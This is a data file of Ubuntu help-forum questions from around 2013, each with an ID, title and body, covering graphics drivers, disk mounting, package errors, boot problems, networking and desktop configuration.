316386	extension `` glx '' missing on display `` :0 '' , raden , 12.04 kde	at some point my opengl stopped working in kubuntu 12.04 . `` glxinfo '' reports xlib : extension `` glx '' missing on display `` :0 '' . i know it worked previously since i was using before , even developing for it , so there must be some update to blame . i just want to know how to fix it . i 've looked through several other questions/searches and mostly they deal with problems with nvidia . i have a radeon card , and i 'm not using the binary drivers ( i strictly use the supported drivers ) . thus i 'm at a loss as to what the problem is . in my xorg.0.log i find the below line , just after it finds all the radeon stuff . why is it attempting to use the nvidia driver ( i do n't have it installed ) . ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found )
316388	android using ubuntu one files api for upload a file	i have a big problem , i 'm trying upload a file to my ubuntu one account using the files api for android . i think that my authentication process is ok , but when i call the uploadfile u1fileapi method , i get a 403 forbidden error . this is my code : /* upload method */ public void uploadfile ( string pfilepath , u1fileapi pu1api ) { try { pu1api.uploadfile ( pfilepath , `` application/octet-stream '' , `` /~/ubuntu one/debug tests/ '' , true , true , new u1uploadlistener ( ) { @ override public void onsuccess ( u1node arg0 ) { log.i ( `` debug ubuntu one '' , `` log file uploaded.. '' ) ; } } , new u1canceltrigger ( ) ) ; } catch ( exception e ) { log.i ( `` debug - ubuntu one upload '' , e.getmessage ( ) ) ; } } /* authentication method */ private boolean startubuntuoneservice ( ) { final httpclient httpclient = gethttpclient ( ) ; final string username = p.u1_username ; final string password = p.u1_password ; oauthauthorizer oauthauthorizer = null ; try { string oauthdata = null ; // we need to generate an access token at login.ubuntu.com // and transfer it to ubuntu one , in order to successfully // communicate with ubuntu one . final authenticateresponse auth = authenticate ( httpclient , username , password ) ; oauthdata = auth.getserialized ( ) ; // oauth data we received contains consumerkey , consumersecret , tokenkey and tokensecret . oauthauthorizer = oauthauthorizer.getwithtokens ( oauthdata , new plaintextmessagesigner ( ) ) ; // make sure our time is not off too much . oauthauthorizer.synctimewithu1 ( httpclient ) ; } catch ( authenticationexception e ) { log.d ( `` fully - ubuntu one '' , `` wrong username or password . `` ) ; return false ; } catch ( ioexception e ) { log.d ( `` fully - ubuntu one '' , `` connection problem : `` + e.getmessage ( ) ) ; return false ; } catch ( timedriftexception e ) { log.d ( `` fully - ubuntu one '' , `` could not sync time with ubuntu one . sync with ntp ? `` ) ; return false ; } catch ( u1pingexception e ) { log.d ( `` fully - ubuntu one '' , `` could not authorize access to ubuntu one . please try again . `` ) ; return false ; } // we are all set , ready to talk to ubuntu one file storage api . mu1fapi = new u1fileapi ( mainactivity.class.getpackage ( ) .getname ( ) , `` 1.0 '' , httpclient , oauthauthorizer ) ; // execute dropbox upload thread mdropboxthread.executeonexecutor ( asynctask.thread_pool_executor ) ; return true ; } private static authenticateresponse authenticate ( httpclient httpclient , string username , string password ) throws authenticationexception , ioexception , timedriftexception , u1pingexception { final basicauthorizer basicauthorizer = new basicauthorizer ( username , password ) ; final u1authapi authapi = new u1authapi ( mainactivity.class.getpackage ( ) .getname ( ) , `` 1.0 '' , httpclient , basicauthorizer ) ; // make sure your token name is in the format of 'ubuntu one @ your_string '' final authenticateresponse response = authapi.authenticate ( `` ubuntu one @ nexus 7 '' ) ; authapi.setauthorizer ( new oauthauthorizer ( response , new hmacsha1messagesigner ( ) ) ) ; // make sure our time is not off too much . oauthauthorizer.synctimewithu1 ( httpclient ) ; // single sign on has the token , let ubuntu one know about it . authapi.pingubuntuone ( username ) ; return response ; } why is this 403 error occurring , and how can i fix this ? really appreciate your help !
316396	upgrade texlive from 2012 to 2013 with ubuntu	i have downloaded texlive 2013 and installed it as explained on the developer 's website . at the end in the terminal i got the following message : add /usr/local/texlive/2013/texmf-dist/doc/info to infopath . add /usr/local/texlive/2013/texmf-dist/doc/man to manpath ( if not dynamically found ) . most importantly , add /usr/local/texlive/2013/bin/x86_64-linux to your path for current and future sessions . what should i do ? furthermore when compiling my documents , emacs is still using the version 2012 of texlive , what should i do to use the 2013 version ( i already removed the texlive package 2012 with the ubuntu software center ) , i 'm running ubuntu 12.10 ?
316397	set desktop font via command line and without gnome-settings-daemon ?	i 've switched from unity to i3wm and i 'm really enjoying it however there is a slight problem : i ca n't set the desired desktop font without running gnome-settings-daemon . and at the moment this is the only reason for running it . for the gtk apps i can set the font i like in .gtkrc-2.0 but that does n't have any effect on the fonts appearing in the menus , dialogs , etc . what i actually want is the same effect as gsettings set org.gnome.desktop.interface font-name 'roboto 10 ' gets but this only works if gnome-settings-daemon is running . also i tried to replace dejavu sans with roboto using .fonts.conf but that did n't work as well . this is driving me nuts since weeks so i 'd just like to know is it possible at all ? maybe i shall have a look at .xresources or something ? otherwise i guess i 'll just have to replace the font files themselves to reach the goal . thx in advance for any help . ps . 12.04 and 13.04 no luck on either .
316401	compile or install octave 3.6 in ubuntu 12.04 with atlas	i want to install or compile from source octave 3.6.4 in ubuntu 12.04 ( 64 bit ) that uses the atlas library ( to make it fast when executing vectorized code ) . did anybody ever do that ? can somebody put together instructions how to do that ? i tried the following : get octave sources get atlas using apt-get install get lapack sources ( 3.4.2 ) edit the lapack makefile to use /usr/lib/atlas-base/atlas/libblas.so.3gf as libblas add /usr/atlas-base and /usr/atlas-base/atlas to /etc/ld.so.conf.d/libc.conf in the octave sources directory ./configure , make waiting waiting waiting start octave and benchmark a matrix inversion : still it is ~2 - 4 times slower than matlab running on the same computer and actually not faster than it was before was my approach correct or should octave be compiled differently ? can i find out whether it is using atlas correctly other than by a benchmark ? thanks ! niels
316402	can i install linux on a external hard drive and then use it to delete the existing linux on my computer	the question is a bit weird but can i put linux on a external hard drive and then run my pc of that and then delete the linux partition on my laptop . i want to install windows but the booting with the disc does n't work properly another problem about this is that the windows disc is .exe , and you ca n't run that from linux
316405	black screen after installing ubuntu 13.4	i downloaded ubuntu 13.4 and i made a bootable usb and i installed it successfully the problem is when the setup finishes i restart and after restarting i get only a black screen after my motherboard 's logo . i installed it several times and the same error happens . i installed it in nomodeset and the same error happens . i am sure from that there is no errors in my usb drive and i am sure from that i installed it right . i got ati radeon 5770 vga card so what should i do ? ! !
316406	how to find the date ubuntu was installed ?	i 'd like to find out ( ideally via terminal ) how long my operating system ( ubuntu 12.04 lts ) has been installed - either that or the date on which the installation took place . is this possible ? if so , how can it be accomplished ?
316410	from where i 'm getting programs in unity launcher ?	when i press ubuntu button ( former windows button ) on my keyboard and start typing application name i want to launch , i see there 2 instances of the same programm ( in my case it 's pycharm ide ) . i have checked my /usr/share/applications ( it 's having only the one pycharm.desktop ) and ~/desktop folders ( does n't have anything ) . i suspect i created somehow somewhere the .desktop shortcut for older version of pycharm , which i 'm not using anymore . the problem is i do n't remember where and how i did it . and ubuntu launcher is n't telling me from where program shortcut came from to my search results . so i ca n't get rid of this second instance of pycharm shortcut . could someone please send me to the webpage which explains all places unity launcher uses to find applications ? any other help would be appreciated . i 'm using ubuntu 13.04 . thanks .
316413	piping pdffonts to grep	so i want to use grep to list the filenames of pdfs that match the search string `` type 1c '' . grep is supposed to get the data from pdffonts , but when i execute this syntax it just executes pdffonts normally . find . -type f -iname `` *.pdf '' -print0 -exec pdffonts { } \ ; |xargs -0 grep -c -l `` type 1c '' when i add - after { } i get the help file of pdffonts , which must mean it does n't support this argument . but how can i pipe pdffonts to grep then ?
316415	new to this , want to install cairo desktop	the command that i typed into terminal was sudo add-apt-repository ppa : cairo-dock-team/ppa it then says to enable ppa in list of repositories , and gives more commands to enter . after entering those , it says that i have held broken packages . what does this mean , and how do i fix it ?
316417	where is more documentation about vino-server ?	about vino-server , which pops up in my firewall , i found only little here : https : //help.ubuntu.com/community/vnc/servers # vino what is vino-server doing more else in vnc ? is vino-server necessary , or can i leave vino-server out of my installation ?
316418	sennheiser mm 400 : how to use headset controls	i 've successfully connected my sennheiser mm400 bluetooth headset , and it 's playing everything over them . now i 'm using spotify to listen to music , and i tought it would be nice to control spotify via the controls on the right side of the headset . only problem : while volume keys ( up and down ) do work , i ca n't use the previous and next keys ( left and right ) . when i press one of them , the following appears on my screen : anyone got an idea how i could make the controls work ? thanks !
316423	no boot menu after installing ubuntu 13.04	i installed ubuntu 13.04 using a usb drive , my primary os is win8 . after i restarted there was no option to boot into ubuntu , it just automatically booted into win8 , even after i put the os boot manager before the usb in the bios settings
316428	internet connection cuts out	i have a wireless internet connection and whenever i use steam it usually cuts off . plus whenever i use bit-torrent it generally cuts off too . i moved closer to my router but it still happens . i heard that there is some connectivity issues already in ubuntu 13.04 but i never found an answer to resolve it . i heard you need this so here you go . 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8191seva wireless lan controller [ 10ec:8171 ] ( rev 10 ) subsystem : hewlett-packard company device [ 103c:1467 ] kernel driver in use : rtl8192se 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) subsystem : hewlett-packard company device [ 103c:1605 ] kernel driver in use : r8169 help would be nice
316433	how to remove duplicate element from context menu ?	when i right click on a folder - i see double element `` file '' - open in nautilus ( installed on my lubuntu ) .
316434	everything seems fine , but `` mount is denied because the ntfs volume is already exclusively opened . ''	my laptop is set up with separate win7 and ubuntu partitions . i set up my dropbox to link to the default folder inside the win7 partition , but it was complaining at start-up about not being able to locate the folder since the drive was n't mounted yet . so , i added the following line to my fstab : uuid=627603217602f597 /media/windows ntfs-3g rw , auto , user , exec , nls=utf8 , fmask=0111 , dmask=0000 0 0 using this guide . anyway , it worked , but when i look at the `` devices '' section in home folder , i see the drives : system reserved 194 gb filesystem < -- this is the one i mounted on fstab 61 gb filesystem < -- just another drive in win7 2.2 gb swap space windows what 's strange is this `` windows '' drive . i click it and it gives me the error : unable to mount windows mount is denied because the ntfs volume is already exclusively opened . the volume may be already mounted , or another software may use it which could be identified for example by the help of the 'fuser ' command . just for reference 's sake , here 's my fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=cb40a28f-a046-454a-9a4a-4d8ca76a581c / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation # uuid=708cc5c9-f05b-4fda-8ab9-574e8fed283f none swap sw 0 0 # /dev/mapper/cryptswap1 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 # win7 c-drive partition uuid : 627603217602f597 uuid=627603217602f597 /media/windows ntfs-3g rw , auto , user , exec , nls=utf8 , fmask=0111 , dmask=0000 0 0
316438	why do i get `` missing os '' after installing with minimal cd ?	i needed to install ubuntu from a minimal cd because i wanted to setup raid . however i get `` missing os '' when booting from the harddisk containing the root partition ( i did not create a separate boot partition ) . luckily it boots from the disk when i try to boot from the usb pen ( yes i checked , i am not booting from that usb pen ) . the harddisk containing the root partition has two partitions , root and swap . /home and /var are on different volumes . interestingly there the partition program left about about 1mb in the beginning of that drive although i asked for the partition to be placed and the beginning . this space is left there even if i try to add a partition for the bios boot area . i dont think that shows up when partitioning with 12.04 . ive tried installing a couple of times now , using different setups on the harddisk containing the root partition . how do i setup boot correctly ?
316439	using apt-fast to download torrents	while surfing the net i came across a command called apt-fast which speeds up downloading packages . i 'm not familiar with this command . can that command be used to download torrents faster like an album your downloading through a torrent client such as transmission , and , if so , what do you put at the end of the command to specify what to speed up , eg : do you put apt-fast- ( link address ) or apt-fast- ( eminem discography ) ? also , could you run this command in the middle of your download or does it have to be done at the start ?
316440	( steam ) mount ext4 partition with exec permissions	i have most of my disk space in an ext4 partition which i automountt on startup through fstab . the corresponding line in fstabis this one : /dev/sda9 /media/rest ext4 users , user 0 0 now i 'm trying to install a game through steam and i want the data folder to be stored in said partition , but when i try to select a folder in it i get the error : new steam library folder must be on a filesystem mounted with execute permissions so i need that partition to have execute permissions . i 'm guessing modifying the line in fstab to this might do the trick : /dev/sda9 /media/rest ext4 users , user , exec 0 0 but i 'm not really sure and i do n't want to mess up my system . is this the correct solution for the mentioned issue ?
316445	ca n't install linux headers	i keep getting an error : e : the package linux-headers-3.5.0-31-generic needs to be reinstalled , but i ca n't find an archive for it . i have searched everywhere for this error and how to fix it but since this came up there has been no reference to this anywhere . any help please or it will be a complete re-install to get rid of the problem . # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring universe deb http : //gb.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //gb.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main
316447	depends : samba4-common-bin	i have just made the update to the 12.10 version . but when i tried to install all the updates i received the following messages : the following packages have unmet dependencies : samba4 : depends : samba4-common-bin ( = 4.0.0~alpha18.dfsg1-4ubuntu2 ) but 4.0.0~beta2+dfsg1-3 is installed depends : upstart-job but it is a virtual package can someone please help me ? thank you
316449	despite ssh-agent , tortoisehg keeps asking for the passphrase	i am using ubuntu 12.04 and tortoisehg to access repositories in bitbucket . i use ssh keys for authentication . i run : ssh-agent then ssh-add and enter my passphrase . i can now use mercurial and do hg clone ssh : //hg @ bitbucket.org/ < username > /myrepos without it aksing for my passphrase . it also works for tortoisehg if i start it from the terminal window with thg however , if i start tortoisehg by clicking the tortoise icon i keep getting the following window each time i want to communicate with bitbucket : how do i make tortoisehg stop asking for the passphrase all the time , even if it was started by clicking the icon ?
316461	remapping mouse button	i want to remap my middle mouse button to simulate alt-tab ( switch between running applications ) on ubuntu 12.04 . how would i do that ?
316470	theme , keyboard , wallpaper and mouse settings are suddenly non-persistent	i booted up my thinkpad w510 with ubuntu 12.04 yesterday and was surprised by several things at once : instead of my wallpaper showing up my screen remained black . double finger scrolling did n't work anymore . my custom keyboard layout settings ( ctrl+alt+del for killing the xserver , using caps lock as hyper key ) were disabled again . my gtk+ and icon theme were reset to the default . nautilus managed my desktop again as soon as i started it . ( i 'm using i3 as window manager and use to have my desktop plain blank . ) now , i ca n't remember either fiddling with my dotfiles nor doing an apt-get upgrade . also , trying to change the settings again does n't work because all those settings are non-persistent , now , i.e . gnome-tweak-tool and system settings always show the default values after starting them . the only exception is gpointing-device-settings : i managed to get double finger scrolling working again . i suppose the file permissions for some of my dotfiles might cause this ? unfortunately , having taken a quick look at `` s -la ~ '' i did n't notice anything strange . can you tell me in which folder ( s ) to look exactly ? on a side note : my /var/log/syslog is suddenly being spammed with messages like this one : jul 4 23:32:35 philosoph kernel : [ 1792.003075 ] type=1400 audit ( 1372973555.513:20349 ) : apparmor= '' denied '' operation= '' open '' parent=19062 profile= '' /usr/bin/evince-thumbnailer '' name= '' /usr/local/lib/libgobject-2.0.so.0.3600.3 '' pid=2113 comm= '' evince-thumbnai '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 âś which remembers me that i tried to install glib 2.36.3 the other day without removing ubuntu 12.04 's default glib 2.32 . might that have anything to do with my issues ? thanks for you help !
316471	need help with moving ubuntu install to usb	this is my first time putting ubuntu on a usb , and i need help . is it a straight copy from the download to the usb ?
316473	gog on linux installation procedure	i wanted to install gog on linux ( http : //gogonlinux.com/ ) and as i went through the install process ( which is for ubuntu12.04 ) and the result is that i have all the files built by python , but no executable or any way to access the client at all . i 've checked the forums there , but i do n't believe ( since it 's beta ) that i will receive any possible insight . does anyone know how to create the physical linking or what exactly i 've ignored ?
316476	x server without unity	i have ubuntu 13.04 installed on a gigabyte brix and serving as a htpc ( plugged into my television through a hdmi connection ) my question is pretty simple , is it possible to start ubuntu without the unity desktop and still be able to launch graphical applications such as xbmc ?
316479	what are the 3 new img files for installing ubuntu touch 13.10 saucy ?	where are the new instructions for installing ubuntu touch 13.10 saucy ? the old instructions said using adb to push the two zip files onto /sdcard/ . why are there 3 additional img files for installing ubuntu 13.10 saucy ? for example , for my nexus 10 , i had to download there 3 img files : saucy-preinstalled-boot-armel+manta1.img saucy-preinstalled-recovery-armel+manta.img saucy-preinstalled-system-armel+manta.img as well as the 2 zip files : saucy-preinstalled-touch-armel+manta.zip saucy-preinstalled-phablet-armhf.zip are they supposed to be loaded in a specific order to work ? i 'm using windows 8 as my platform .
316482	why apt-get not use packages availabe in archives folder copied by aptoncd instead download again	i used aptoncd to creat .iso of installed packages and also add some packages not installed by apt-get ( i have .deb from previous install like vlc , apache2 etc ) . i am able to restore all packages using aptoncd but when i try to install vlc or any other package . sudo apt-get install vlc it try to download it again 0 upgraded , 59 newly installed , 0 to remove and 149 not upgraded . 1 not fully installed or removed . need to get 0 b/16.5 mb of archives . after this operation , 66.7 mb of additional disk space will be used . i ca n't use this sudo dpkg -i /var/cache/apt/archives/*.deb because there are many packages that related to gnome3 and do n't want to reinstall ubuntu again . i am on ubuntu 13.04 is there any way to do it . or aptoncd == copy your .deb manually
316486	problems with cryptsetup during update	i 'm still new to all of this . i think i was installing a bunch of updates , and after what seemed like an hour or so , i finally got this message in the terminal window : cryptsetup : warning : failed to detect canonical device of overlayfs cryptsetup : warning : could not determine root device from /etc/fstab what does this mean , and how do i fix it ?
316487	ideapad y510p and gnu/linux	do you know if ideapad y510p is compatible with gnu/linux ? click here for the ideapas y510p ! thanks !
316490	( fixed ) radeon hd 3870 driver installation issue on `` ubuntu 12.04 precise ''	radeon hd 3870 driver installation issue on `` ubuntu 12.04 precise '' : edit fixed by using the makson96/fglrx repository method , according to the latest answer given here by user named zuul or roby . all other methods have failed . [ /edit ] i know that this is my actual driver because : ~ $ lspci | grep -i amd 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv670 [ radeon hd 3870 ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati rv670/680 hdmi audio [ radeon hd 3690/3800 series ] steps i 've taken : gone here : http : //support.amd.com/us/gpudownload/linux/legacy/pages/legacy-radeon_linux.aspx installed `` amd catalystâ˘ 13.1 proprietary linux x86 display driver '' restarted launched `` amdcccle '' and got the following error message : ** '' initialization error '' ** there was a problem initializing catalyst control center linux edition . it could be caused by the following . no amd graphics driver is installed , or the amd driver is not functioning properly . please install the amd driver appropriate for you amd hardware , or configure using aticonfig . -5 . got my hands on something called : `` ubuntu-amd-catalyst-install '' , installed and and launched it and it showed me the following error message : '' the fan club - ubuntu amd catalystâ˘ install '' detected graphics controller : hynix semiconductor ( hyundai electronics ) radeon hd 3870 ubuntu 12.04 linux kernel : 3.5 x-server version : your system is not supported by this driver your system is not supported by this driver < -- - ? ? ? ? i installed synaptic and then installed the fglrx driver from there , did n't make `` amdcccle '' start working either . i 've also ran `` aticonfig -- initial '' and it did n't change anything . at the moment i am not pleased because my maximum ( and only ) resolution is 1024x768 and i wish to change that . i definitely remembering installing ubuntu couple of years ago with the same hardware never got this kind of error message . have the ubuntu development team done something wrong over the years to ubuntu that degraded it 's ability to support my ( unchanged ) hardware ? i 've looked up the suggested searches and non of them seem to help me , i put my trust in your hands , i hope that you can help me figure out why ubuntu has stopped supporting my used-to-be-completely-supported graphic card . thanks ahead for any positive helpers . i was told to remove everything i 've done ( which i have by now ) and to go here and use this guide : https : //help.ubuntu.com/community/binarydriverhowto/ati i did , then in step 2.1.8 i got this output after sending the command `` fglrxinfo '' : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 153 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 when it is written in the guide that i should get something like : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6300m series opengl version string : 4.2.11733 compatibility profile context please ubuntu experts i need your help , why is this happenning ? what do i do ?
316491	how to setup lenovo ideapad z500 notebook nvidia optimus drivers ?	i have installed the ubuntu 12.04 on lenovo ideapad z500 notebook . currently i do n't know how to ascertain which card is being used and how to setup the appropriated drivers to use the nvidia optimus .
316492	disabling ipv6 on a single interface	i 'm slightly weirded out by the fact that ubuntu wo n't process ipv4 dhcp unless you explicitly tell it to , but will happily take ipv6 ras unless you tell it not to . is there any way to change the default behaviour to be 'do nothing unless i explicitly turn it on ' ? ( note to answerers : i 'm not looking to globally disable ipv6 , or completely turn off autoconf . i 'm looking to disable autoconf by default ( as in , i do n't want ipv6 unless i say so in /etc/network/interfaces , in the same way that i do n't just get a v4 address unless i 've explicitly turned on dhcp ) . what 's happening is that , for any interface that 's up - e.g . has an ipv4 config - a v6 address tends to just turn up on the interface as well , despite the fact that i 've not enabled that explicitly . the solutions to date are fine as far as they go , but if i disable v6 or autoconf globally , i ca n't then re-enable v6 on a per-interface basis with a simple command in /etc/network/interfaces . i 'm fairly sure i 'm asking for the moon on a stick , mind you . )
316493	how to acces from live cd to windows 7 disks ?	i have live ubuntu 12.10 on usb ( 4gb verbatim ) . i prepared live usb by lili usb creator ( it just copy the iso of ubuntu to usb to be bootable ) . then i booted successfully the live version of ubuntu from my usb . i wanted open windows 7 disk ( ntfs ) from devices but it gived me error ( ĺ kola is name of the disk ) : unable to mount ĺ kola , adding read acl for uid 999 to '/media/ubuntu ' failed : operation not supported . what should i do ? i just need to access to windows disks cause windows crashed and i need backup some data before reinstall . thx
316494	resolv.conf : presence of 'search localdomain ' fails correct dns lookup	scenario : attempt to resolve host named 'puppet ' in domain 'puppet.mydomain.com' resolution is successful if the resolv.conf file does not include search directive for 'localdomain ' and only the domain 'mydomain.com ' . resolv.conf working : nameserver 1.2.3.4 search mydomain.com resolv.conf failed : nameserver 1.2.3.4 search localdomain mydomain.com the system is multihomed both interfaces have `` domain-name mydomain.com '' and `` domain-search mydomain.com '' directives in /etc/network/interfaces . how can the resolution fail with an additional domain ? should n't resolution be attempted for all listed domains ? what do i need to configure to prevent localdomain from being added to the resolv.conf file ?
316496	ubuntu running slow and laggy	my ubuntu has been running pretty slow , but i do n't know why . i have the latest updates and all . i installed ubuntu i368 on a amd processor does that effect the speed ? thank you .
316499	secure boot not enabled + do n't show disk partition in install type	i have asus q400a , originally came with win8 but reformat the hard drive and now running 7 as main os . i was able to run both win 8 and ubuntu 12.04 along with 7 as dual boot . i uninstall the 12.04 to install 13.04 but now i ca n't , when i reboot the system with live cd it says secure boot not enabled . so i changed secure boot disable to enabled from bios , doing that it gives error saying binary is whitelisted . so.i deleted the win8 volume , extend the c to the win8 vol . format the ubutu volume ( i ) . i have 2 partitioned c and d ( for ubuntu ) and 100mb of system recovery . beside that while installing it wo n't show my disk partition on install type . it just showed /dev/sda 750 something i did chdisk and defrag to see anything wrong with partitioning no error showed . i been to worked this out for 2 days.. can someone help me out thanks
316501	windows 7 virtualbox guest in seamless mode has bottom clipped off in ubuntu 13.04	i realise that this is a duplicate of this post but i was unable to comment on that one . i am able to replicate this issue on a fresh install of 13.04 i have tried installing the prop nvidia drivers , this had no effect i then put cinnamon and kde on to see what would happen . neither desktop had this issue , it only happens with unity . the area clipped seems to be exactly the same size as the footer of the guest in a normal window . this clipping only occurs in seamless mode . and only effects the guests windows ( windows 7 ) . a window from the host ( ubuntu 13.04 ) renders correctly to the bottom of the screen . i have tried different resolutions on both the host and the guest , no effect . does anyone have any suggestions ? edit : also if i move the mouse near the bottom of the screen it sort of scrolls down to show the clipped off bit . this was noted in the other post but what is interesting is that the visible part of each open window also scrolls . i mean that if you have a command prompt open and you move you mouse to the bottom of the screen the menu bar at the top disappears and an equal area of the guests desktop is revealed at the bottom . edit : if i plug a second screen into the laptop and apply the display changes , the problem goes away . but if i then reboot the vm it bluescreens on boot until i unplug the second screen and reboot ... .
316504	inexperienced ubuntu user trying to set up internet connection on laptop with 13.04	i have n't installed 13.04 yet , but i need to know how to access internet before i install . can i get instructions ? wireless will be my main form of connection .
316505	can not find the .iso file to create a live usb disk	hi , it may be obvious once you have read this but i am new to using ubuntu 13.04 . i have got it up and running , and i 've been online so far so good . i am now trying to create a bootable usb stick , it 's a 4 gb formatted fat32 disk . i opened startup disk creator , the usb stick shows in bottom portion of the make a start up disc window and this is where it falls apart for . i click on other to select the iso file but it does not show up under desktop or any of the other places in the left pane . any and all help will be gratefully received . thanks .
316512	live usb boot error	i am trying to install ubuntu on an acer aspire 5320 laptop that was abandonded by a friend when he purchased a new machine . i have created several different live usb drives using my primary ubuntu computer and both startup disk creator and unetbootin . i have verified that these disks are all bootable using a third computer , a gateway that is currently running linux mint . the problem is that every time i put one of these into the acer i get a black screen with a two word message : boot error . i have entered the cmos and ensured that the usb is the first boot option , so the error is being thrown in relation to the usb . i have since taken the situation from bad to worse . the acer was running windows vista . the windows installation worked but was hopelessly slow . i was able to boot into vista and access the usb from inside windows . it gave me the option of booting to the usb now ( which i knew would throw the aforementioned boot error ) or creating a boot helper on the hard drive . i opted for creating the boot helper . this ran to about 70 % when it threw an error because there was no more space on the hard drive ( i know , i 'm an idiot for not checking . my friend had literally crammed her entire hard drive with photos and videos . ) . the result of this being that apparently just enough of the boot helper made it 's way onto the hard drive that now when i try to boot to the hard drive i get absolutely nothing . just a black screen with a cursor . i can no longer get into windows , and i can not boot to the usb . i appear to be completely stuck . i saw one similar question on here and the suggestion was to go into the bios and reset the usb mass storage option , but that is not an option in the cmos on this acer . the cmos is extremely limited . any help would be greatly appreciated .
316514	launch chrome with a very minimal window manager	so i 'm setting up a box running lubuntu and i want it to run a news website with chrome browser on startup and with a very minimal window manager ( no desktop icons , no panel ... ) . is there any way to trick lightdm or another window manager to start and run one and only app ? thanks .
316517	ca n't run a .sh file even when changing directory	i want to know how to excute a .sh file . i have tried to change the directory as ( wi-feye-v0.5.6/bin $ ) and run ./filename.sh but it said : bash : ./evilgrade.sh : /usr/bin/expect : bad interpreter : no such file or directory any suggestion ?
316518	errors during apt-get upgrade	when using sudo apt-get update ; sudo apt-get upgrade , i always get the following error messages ( sometimes more than once ) : processing triggers for libc-bin ... ldconfig deferred processing now taking place /sbin/ldconfig.real : /usr/lib32/libstdc++.so.6.0.18-gdb.py is not an elf file - it has the wrong magic bytes at the start . /sbin/ldconfig.real : /usr/lib/libisl.so.10.1.1-gdb.py is not an elf file - it has the wrong magic bytes at the start . what does this mean ( how can python source files be elf , i mean ) ? and how can i fix this ? thanks . additional info : i use zsh rather than bash . is this a shell compatibility issue ?
316520	disable online accounts icon	how can i prevent the online accounts icon from showing in the launcher ? after installing 13.04 and logging in to gmail in firefox , i was asked if i wanted to add gmail to online accounts . i clicked 'yes ' and then changed my mind before entering my password . now whenever i log in to gmail in firefox , an online accounts icon shows up in the launcher . if i right click and choose 'quit ' then the gmail tab in firefox closes . how can i remove this icon permanently , or else disable online accounts entirely ?
316527	how can i make new wireless connections use a vpn by default ?	i check this box every time i connect to a new wireless network : how can i make it enabled by default for new connections ?
316535	nautilus compress option in context menu error	when i right click to compress a file in nautilus 3 . 4 . 2 ( ubuntu 12 . 04 ) the window displays without its decorations ( the buttons for close , minimize , maximize , resize , options , etc ) . how can i fix it ?
316536	help tarball & deb files install issues	how 's it going i am fairly new to ubuntu and was trying to get several programs installed and realized that alot of the installations came in the form of tar and deb files . i have no idea how to install tar files so i looked up that you can covert them into deb files and install them via ubuntu software center . so i did that but when the deb file finished installing i looked for the programs via the dash and could not find the program . when i looked at the install section in ubuntu software center it was not there either . just want to see if anyone could give me steps on how to install both debs and tar files since im new and only use to theinstall processes in windows . i really like this os and would like to learn . thank you for your time and patience . oh and would some programming knowledge be needed to use this os to its full potential ? if so what can i do to learn . thanks again .
